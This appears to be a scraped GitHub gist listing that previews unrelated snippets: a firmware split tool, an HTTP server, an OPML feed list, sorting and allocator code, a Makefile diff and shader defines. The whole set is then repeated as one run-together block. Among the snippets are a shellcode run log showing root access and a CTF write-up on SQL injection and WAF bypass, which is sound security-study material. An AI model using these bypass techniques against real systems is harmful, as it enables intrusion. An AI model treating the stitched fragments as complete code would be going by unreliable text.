Wojciech Miłkowski milkowski

## sepsplit.c
/*
 *  SEP firmware split tool
 *
 *  Copyright (c) 2017 xerub
 */

#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

## ABOUT.md

      
              5 files
            
          
              60 forks
            
          
              19 comments
            
          
              190 stars
            
          
                laobubu
                / ABOUT.md
            
            
              Last active
              March 23, 2024 05:28
            
              
                A very simple HTTP server in C, for Unix, using fork()
              
          
    Pico HTTP Server in C

This is a very simple HTTP server for Unix, using fork(). It's very easy to use
How to use


include header httpd.h
write your route method, handling requests.
call serve_forever("12913") to start serving on port 12913


## cool-game-programming-blogs.opml
<?xml version="1.0" encoding="UTF-8"?>
<opml version="1.0">
    <head>
        <title>Graphics, Games, Programming, and Physics Blogs</title>
    </head>
    <body>
        <outline text="Tech News" title="Tech News">
            <outline type="rss" text="Ars Technica" title="Ars Technica" xmlUrl="http://feeds.arstechnica.com/arstechnica/index/" htmlUrl="https://arstechnica.com"/>
            <outline type="rss" text="Polygon - Full" title="Polygon - Full" xmlUrl="http://www.polygon.com/rss/index.xml" htmlUrl="https://www.polygon.com/"/>
            <outline type="rss" text="Road to VR" title="Road to VR" xmlUrl="http://www.roadtovr.com/feed" htmlUrl="https://www.roadtovr.com"/>

## gist:27fe7f3c241f69be19e5
  [+] Entered shellcode
  [+] UID: 0, GID: 0
[DIR]: .
[DIR]: ..
[DIR]: adm
[DIR]: app_tmp
[DIR]: data
[DIR]: dev
[DIR]: eap_user
[DIR]: eap_vsh

## paralleldelaunay.rst

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                paniq
                / paralleldelaunay.rst
            
            
              Last active
              December 24, 2021 01:00
            
              
                Parallelizable Gather-based Delaunay Transforms
              
          
    Parallelizable Gather-based Delaunay Transforms

by Leonard Ritter, Duangle GbR
Today I figured out how to do GPU-friendly Delaunay transforms, and I'd like to describe how the algorithm works before I forget everything.
What the algorithm does is to flip edges in a half-edge triangle mesh where a flip would improve the quality of the adjacent triangles (an equilateral triangle

  
## pool.lisp
; Implementation for a pool allocator that guarantees compactness
; (unsorted gapless iteration without indirections) while preserving element ids
; (using one order-optimized indirection), with insertion, deletion and lookup
; in O(1) time.
;
; the memory requirement is (sizeof index-type) * capacity, typically
; 4 bytes per entry.
;
; Because all id <-> index assignments are symmetric swaps, only a single table
; is required to resolve index from id and id from index.

## smoothsort.lua
-- This is the LuaJIT implementation of Smoothsort [1], a comparison-based
-- sorting algorithm with worst-case asymptotic O(n log n) behaviour, best-case
-- O(n) behaviour, and a smooth transition in between. Largely based on the C++
-- code by Keith Schwarz [2], translated to LuaJIT by Lesley De Cruz.

-- [1] Dijkstra, E. W. (1982). Smoothsort, an alternative for sorting in situ.
-- Science of Computer Programming, 1(3), 223-233.
-- [2] Schwarz, K. Smoothsort demystified. http://www.keithschwarz.com/smoothsort/.

local ffi = require("ffi")

## usecompat.diff
diff --git a/Makefile b/Makefile
index 7b200d7..4ecd833 100644
--- a/Makefile
+++ b/Makefile
@@ -158,7 +158,7 @@ endif

 $(LUAJIT_LIB): build/$(LUAJIT_TAR)
 	(cd build; tar -xf $(LUAJIT_TAR))
-	(cd $(LUAJIT_DIR); make CC=$(CC) STATIC_CC="$(CC) -fPIC")
+	(cd $(LUAJIT_DIR); make CC=$(CC) STATIC_CC="$(CC) -fPIC" Q="" XCFLAGS="-DLUAJIT_ENABLE_LUA52COMPAT")

## XSD
There was an XSD challenge, which nobody, as far as I know, solved in an intended way. We weren't quite sure that this was xsd, and found SQLi first.
The vulnerable interface was parsing XML from POST requests to /tickets.php and its id parameter was vulnerable to sqli. We quickly understood that the WAF enforced the parameter length to be  exactly 35 chars long, which was a nuisance. Fortunately, we found that changing host to foo.waf-bypass.com (from the intended choo-choo.waf-bypass.com) removed that restriction. All that was left was to bypass the syntax anomaly detection, which was quite easy. The final vector is as follows (db was postgres, so this uses a relatively new error-based box() vector with xml functions to quickly get all database):
POST /tickets.php HTTP/1.1
Host: hui.phdays.com
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Referer: http://choo-choo.phdays.com/index.php?search=%27%22%3E
Content-Length: 174
Cookie: WAFBYPASS=5727e690-39f4-44f1-a271-c6edfc1b4336
Connection: keep-alive

## gist:1c2e27b71006023a1108
// add this in your shader before using min16float etc. in current (4.x and 5.0)
// unity versions. will fix this soon
#if !defined(SHADER_API_D3D11) && !defined(SHADER_API_D3D11_9X)
#define min16float half
#define min16float2 half2
#define min16float3 half3
#define min16float4 half4
#define min10float fixed
#define min10float2 fixed2
#define min10float3 fixed3
	/*
	* SEP firmware split tool
	*
	* Copyright (c) 2017 xerub
	*/

	#include <fcntl.h>
	#include <stddef.h>
	#include <stdio.h>
	#include <stdlib.h>
	<?xml version="1.0" encoding="UTF-8"?>
	<opml version="1.0">
	<head>
	<title>Graphics, Games, Programming, and Physics Blogs</title>
	</head>
	<body>
	<outline text="Tech News" title="Tech News">
	<outline type="rss" text="Ars Technica" title="Ars Technica" xmlUrl="http://feeds.arstechnica.com/arstechnica/index/" htmlUrl="https://arstechnica.com"/>
	<outline type="rss" text="Polygon - Full" title="Polygon - Full" xmlUrl="http://www.polygon.com/rss/index.xml" htmlUrl="https://www.polygon.com/"/>
	<outline type="rss" text="Road to VR" title="Road to VR" xmlUrl="http://www.roadtovr.com/feed" htmlUrl="https://www.roadtovr.com"/>
	[+] Entered shellcode
	[+] UID: 0, GID: 0
	[DIR]: .
	[DIR]: ..
	[DIR]: adm
	[DIR]: app_tmp
	[DIR]: data
	[DIR]: dev
	[DIR]: eap_user
	[DIR]: eap_vsh
	; Implementation for a pool allocator that guarantees compactness
	; (unsorted gapless iteration without indirections) while preserving element ids
	; (using one order-optimized indirection), with insertion, deletion and lookup
	; in O(1) time.
	;
	; the memory requirement is (sizeof index-type) * capacity, typically
	; 4 bytes per entry.
	;
	; Because all id <-> index assignments are symmetric swaps, only a single table
	; is required to resolve index from id and id from index.
	-- This is the LuaJIT implementation of Smoothsort [1], a comparison-based
	-- sorting algorithm with worst-case asymptotic O(n log n) behaviour, best-case
	-- O(n) behaviour, and a smooth transition in between. Largely based on the C++
	-- code by Keith Schwarz [2], translated to LuaJIT by Lesley De Cruz.

	-- [1] Dijkstra, E. W. (1982). Smoothsort, an alternative for sorting in situ.
	-- Science of Computer Programming, 1(3), 223-233.
	-- [2] Schwarz, K. Smoothsort demystified. http://www.keithschwarz.com/smoothsort/.

	local ffi = require("ffi")
	diff --git a/Makefile b/Makefile
	index 7b200d7..4ecd833 100644
	--- a/Makefile
	+++ b/Makefile
	@@ -158,7 +158,7 @@ endif

	$(LUAJIT_LIB): build/$(LUAJIT_TAR)
	(cd build; tar -xf $(LUAJIT_TAR))
	- (cd $(LUAJIT_DIR); make CC=$(CC) STATIC_CC="$(CC) -fPIC")
	+ (cd $(LUAJIT_DIR); make CC=$(CC) STATIC_CC="$(CC) -fPIC" Q="" XCFLAGS="-DLUAJIT_ENABLE_LUA52COMPAT")
	There was an XSD challenge, which nobody, as far as I know, solved in an intended way. We weren't quite sure that this was xsd, and found SQLi first.
	The vulnerable interface was parsing XML from POST requests to /tickets.php and its id parameter was vulnerable to sqli. We quickly understood that the WAF enforced the parameter length to be exactly 35 chars long, which was a nuisance. Fortunately, we found that changing host to foo.waf-bypass.com (from the intended choo-choo.waf-bypass.com) removed that restriction. All that was left was to bypass the syntax anomaly detection, which was quite easy. The final vector is as follows (db was postgres, so this uses a relatively new error-based box() vector with xml functions to quickly get all database):
	POST /tickets.php HTTP/1.1
	Host: hui.phdays.com
	Content-Type: text/xml
	X-Requested-With: XMLHttpRequest
	Referer: http://choo-choo.phdays.com/index.php?search=%27%22%3E
	Content-Length: 174
	Cookie: WAFBYPASS=5727e690-39f4-44f1-a271-c6edfc1b4336
	Connection: keep-alive
	// add this in your shader before using min16float etc. in current (4.x and 5.0)
	// unity versions. will fix this soon
	#if !defined(SHADER_API_D3D11) && !defined(SHADER_API_D3D11_9X)
	#define min16float half
	#define min16float2 half2
	#define min16float3 half3
	#define min16float4 half4
	#define min10float fixed
	#define min10float2 fixed2
	#define min10float3 fixed3